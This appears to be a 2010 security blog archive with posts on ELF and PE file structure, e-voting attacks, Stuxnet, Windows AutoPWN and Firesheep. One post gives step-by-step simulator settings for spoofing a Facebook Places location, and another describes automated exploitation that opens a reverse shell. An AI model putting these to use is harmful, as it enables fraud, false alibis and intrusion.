$readelf -S test There are 28 section headers, starting at offset 0x80c: Section Headers:[Nr] Name Type Addr Off Size ES Flg Lk Inf Al........[ 4] .dynsym DYNSYM 08048174 000174 000060 10 A 5 1 4........[11] .plt PROGBITS 08048290 000290 000030 04 AX 0 0 4[12] .text PROGBITS 080482c0 0002c0 0001d0 00 AX 0 0 4........[20] .got PROGBITS 080495d8 0005d8 000004 04 WA 0 0 4[21] .got.plt PROGBITS 080495dc 0005dc 000014 04 WA 0 0 4........[22] .data PROGBITS 080495f0 0005f0 000010 00 WA 0 0 4[23] .bss NOBITS 08049600 000600 000008 00 WA 0 0 4........[26] .symtab SYMTAB 00000000 000c6c 000480 10 27 2c 4........ .text section is a place where the compiler put executablescode. As the consequence, this section is marked as executable ("X" onFlg field). In this section, you will see the machine codes of ourmain() procedure$ objdump -d -j .text test
-d tells objdump to diassembly the machine code and -j tellsobjdump to focus on specific section only (in this case, .text section, but you can play with .bss, .stack, .data)

MAC OSX users can play with ELF files through otool as follows (click to enlarge):

Showing Shared Libraries:

Showing .data area (local vars):
This "quick and dirty" post shows out the basic ELF structure, with a particular focus on the ELF header that is the first element cared by OS Loader. Some tools to play with have been presented. Keep in mind that those tools are very useful for the first file analysis such as malware, virus keylogger etc.

## Friday, December 3, 2010

Hi Folks, during the past days a couple of students asked me a question about Windows PE header. Well, I supposed the PE was a "kind of" well known structure, instead it seems to be pretty much obscured for most of my people.

So I am going to resume very very briefly what PE is giving some useful pictures harvested out here.

Each executable file has a Common Object File Format COFF which is used from the OS loader to run the program. Windows Portable Executable (PE) is one of the COFF available in todays OS. For example the Executable Linking File (ELF) is the main Linux COFF.

Microsoft migrated to the PE format with the introduction of the Windows NT 3.1 operating system. All later versions of Windows, including Windows 95/98/ME, support the file structure. The format has retained limited legacy support to bridge the gap between DOS-based and NT systems. For example, PE/COFF headers still include an MS-DOS executable program, which is by default a stub that displays the simple message "This program cannot be run in DOS mode" (or similar). PE also continues to serve the changing Windows platform. Some extensions include the .NET PE format (see below), a 64-bit version called PE32+ (sometimes PE+), and a specification for Windows CE.

Nowadays the Windows PE header has the following structure (Click To Make it Bigger) .

MZ are the first 2 bytes you will see in any PE file opened in a hex editor. The DOS header occupies the first 64 bytes of the file - ie the first 4 rows seen in the hexeditor in the picture below. The last DWORD before the DOS stub begins contains 00h 01h 00h 00h, which is the offset where the PE header begins.
The DOS stub is the piece of software that runs if the executable is run from DOS environment (for example DOS shell). For retro-compatibility it often executes a printf("This program must be run under Win32");.

The PE header begins with its signature 50h, 45h, 00h, 00h (the letters "PE" followed by two terminating zeroes).
If in the Signature field of the PE header, you find an NE signature here rather than a PE, you're working with a 16-bit Windows New Executable file. Likewise, an LE in the signature field would indicate a Windows 3.x virtual device driver (VxD). An LX here would be the mark of a file for OS/2 2.0. FileHeader is the next 20 bytes of the PE file and contains info about the physical layout & properties of the file e.g. number of sections. OptionalHeader is always present and forms the next 224 bytes. It contains info about the logical layout inside the PE file e.g. AddressOfEntryPoint. Its size is given by a member of FileHeader. The structures of these members are also defined in windows.inc.
The PE header is defined as follows:

Not all these section must be used, but you need to modify the NumberOfSections to add or delete sections from a PE file. The best way to analyze those section is by using PEExplorer or PEID. The following image shows the PEID in use.

EntryPoint is The Relative Virtual Addresses (RVA) of the first instruction that will be executed when the PE loader is ready to run the PE file. If you want to divert the flow of execution right from the start, you need to change the value in this field to a new RVA and the instruction at the new RVA will be executed first. Executable packers usually redirect this value to their decompression stub, after which execution jumps back to the original entry point of the app the OEP. Of further note is the Starforce protection in which the CODE section is not present in the file on disk but is written into virtual memory on execution.

ImageBase is the preferred load address for the PE file. For example, if the value in this field is 400000h, the PE loader will try to load the file into the virtual address space starting at 400000h. The word "preferred" means that the PE loader may not load the file at that address if some other module already occupied that address range. In 99% of cases it is 400000h.

SectionAlignment is the granularity of the alignment of the sections in memory. For example, if the value in this field is 4096 (1000h), each section must start at multiples of 4096 bytes. If the first section is at 401000h and its size is 10 bytes, the next section must be at 402000h even if the address space between 401000h and 402000h will be mostly unused.

FileAlignment is the granularity of the alignment of the sections in the file. For example, if the value in this field is 512 (200h), each section must start at multiples of 512 bytes. If the first section is at file offset 200h and the size is 10 bytes, the next section must be located at file offset 400h: the space between file offsets 522 and 1024 is unused/undefined.

SizeOfImage is the overall size of the PE image in memory. It's the sum of all headers and sections aligned to SectionAlignment.

SizeOfHeaders is the size of all headers + section table. In short, this value is equal to the file size minus the combined size of all sections in the file. You can also use this value as the file offset of the first section in the PE file.

DataDirectory It is the final 128 bytes of OptionalHeader, which in turn is the final member of the PE header IMAGE_NT_HEADERS. DataDirectory is an array of 16 IMAGE_DATA_DIRECTORY structures, 8 bytes apiece, each relating to an important data structure in the PE file. Each array refers to a predefined item, such as the import table. The structure has 2 members which contain the location and size of the data structure in question: VirtualAddress is the relative virtual address (RVA) of the data structure , and isize contains the size in bytes of the data structure.

Summing up the whole PE Header structure in nutshell:

Alright this was a short description of the much more complex Windows PE header. I believe this is what everybody (of course I am not talking about grandma, but security skilled guys) should know about Windows PE. After that when you need to deal with PE header obviously these information aren't enough to attack or to reverse engineer a PE header, so I suggest to look into the most authoritative guides: this, this and this.

## Tuesday, November 30, 2010

### Telecom Working Capital !

Working Capital 2010, Rome(Italy). I will be there ! Live Streaming From here.

## Friday, November 26, 2010

### David Bismark: E-voting without fraud

Brilliant Talk on E-voting "without frauds".
It seems is talking about scantegrity or any other Software Independent voting system (great article from NIST).

But there are many different ways to attack a system like that (Verifiable). For example a great way to attack the system is to attack the feedback chain back to the voter. Let me try with an example:
Voter A votes for OBM. Pol-worker P scans A's ballot and destroys it. A keeps the "receip" and later he will be able to verify it through an apposite service (Check Phase in the following image).

Assuming that everything goes well: the real vote goes to the tally servers and is really counted (with anonymity properties). The attacker may attack the feedback services showing up a wrong feedback to the A. Now A believes that something went wrong since the code he has does not match to the one saw in the feedback service. Everything went well, but the A believes that something went wrong. This is a reputation attack. The attacker modifying the feedback chain makes the voters believe wrong.

Making the voters believe that the voting process has been compromised is the same than really compromise the system. Results and causes are the same.

## Wednesday, November 24, 2010

### Spoofing Geolocations on Facebook Places

Folks,
this easy trick is really funny :). I can imagine a lot of frauds thanks to such a trick. Don't forget that in some countries facebook helps police to investigate on crimes. Being able to prove your presence on another place rather the place you have been, it's really dangerous.

I definitely like Facebook company, but I think they need a little of "security reinforcement" :).

BlackBerry simulator allows you to tweak the GPS to any location on the planet, and the applications on the device respond as such. Of course this is just to test out applications, but why nobody has used it on Facebook Places before is beyond me. But then again, Facebook Places has only been out for the BlackBerry this past week, so it's not much time to really click on to this sort of thing.By editing the GPS location through Simulate > Add > then editing the Name, Latitude and Longitude, which you can get by enabling the LatLong tool on Google Maps Labs, you can spoof your Facebook Places into thinking you're in one place when you're not. Always add more than 7 satellites though as this makes the device think you are in a more accurate location than it is.

## Monday, November 22, 2010

### Stuxnet Malware.

Folks, one of the most interesting malware I've ever seen: the Stuxnet, reprogramming industrial control systems. Its final goal is to reprogram industrial control systems (ICS) by modifying code on programmable logic controllers (PLCs) to make them work in a manner the attacker intended and to hide those changes from the operator of the equipment. In order to achieve this goal the creators amassed a vast array of components to increase their chances of success. Thanks to Symantec great report on it !

Good Job guys !

## Wednesday, November 17, 2010

### Body Scanner Pic Gallery

Sooner or later this would happen: Federals accidentally saved body scan images. I didn't speak with Bruce Schneier, but I am pretty sure he would laughed. This seems so obvious to me... but anyway, lets see what happened.

TSA has said over and over again that body imagers used for security purposes are unable to store, export or print images of passengers.But this week, The U.S. Marshals Service admitted that it had accidentally saved tens of thousands of images recorded on a machine used at a security checkpoint in a Florida courthouse. According to this article on CNET :

"William Bordley, an associate general counsel with the Marshals Service, acknowledged in the letter that 'approximately 35,314 images...have been stored on the Brijot Gen2 machine' used in the Orlando, Fla. federal courthouse. In addition, Bordley wrote, a Millivision machine was tested in the Washington, D.C. federal courthouse but it was sent back to the manufacturer, which now apparently possesses the image database."

## Sunday, November 14, 2010

### Text2Bib

Hi folks,
this month is going to be very very busy for me, a lot of writing reviewing and teaching. Today founding 5 free minutes I wanna point out a really useful tool called text2bib. Text2Bib converts a plain text list of references in any style to BibTeX ... well, in almost any style. Minimal requirements:

1) Either references are separated by blank lines or each line is a separate reference or each reference starts with \bibitem{}, \bibitem{

## Friday, November 5, 2010

### Iphone V.S Android V.S BlackBerry

Folks, I believe this is a self-explanatory brochure... (click on the pic to zooming)

## Thursday, November 4, 2010

### Windows AutoPWN a sweet first step

Hi folks,
today I wanna point out Windows AutoPWN. The goal of the tool is pretty clear:
Autohack your targets with least possible interaction.

Window AutoPWN born to take automatic the way of exploiting windows platforms. It works pretty well, you just need to enter the target IP (or host name) and the local IP (or host name); after that only some optional field such as: CMS path, PHP remote shell, FTP username and proxy. By clicking on the WINAUTOPWN button and everything is done.

The basic concept behind this tool is the same of metasploit auto-exploit plugin. Basically it performs a port scanning within enabled queries, this techniques allows the program to discover what service is hid behind such a port number. Once the program knows what services have been installed on the machine it tries all the possible exploits over the specific ports; one by one. Of course this procedure is not smart at all, it is time and resource consuming, but it is totally automatic. If the launched exploit goes right the program (automatically) spawn a back-tcp-shell to the attacker giving shell control over the victim.

Again, this is not clever, in fact if you try to use this technique in a real hacking scenario you probably will catched from IDS/IPS or Anti-malware behavior analysis tools. On the other hand this is perfect as the first step of penetration testing.

## Sunday, October 31, 2010

Folks, today I suggest this interesting reading entitled: E-voting: How secure is it?

"One of the great fears in an internet election is that you are exposing our votes to manipulation by foreign powers," said Jefferson. "I just consider this to be a major national security risk; a totally unnecessary, needless risk and it's shocking to me that election officials turn away from this. They don't want to hear it, and they certainly don't want to do anything about it."

Short, incisive and clear. Take a look.

## Friday, October 29, 2010

### The Nerdest Clock I Have Ever Seen !

Folks,
how funny is this clock ? Round(p) made me laugh for hours :D !!

## Thursday, October 28, 2010

### Firesheep, amazing simplicity.

Probably everybody already know what firesheep is. Announced at Toorcon 12, it is a session sniffer and hijacker firefox plugin.

If you are an "hard-core" hacker probably you are thinking: "WTF is that ? Where is the innovation in a Freaking session sniffer and/or hijacker ?". Well, I say nothing. It is nothing new per-se, but it is easy, extremely easy to use. With this well done tool everybody will be able to hijack sessions over HTML stream. So yes, nothing new but it is a really really well done nothing new. Before firesheep the probability to have a hijacker in the internet point down your street was pretty low, now is going to be pretty high. I wont say that to prevent this attack is enough an SSL encryption, I wont say that you need to pay attention to certificate spoofing and to HTTPS-Splitting techniques, I just wanna point out that we've just reached the feasibility threshold another time.

Now it's time to build new security weapons....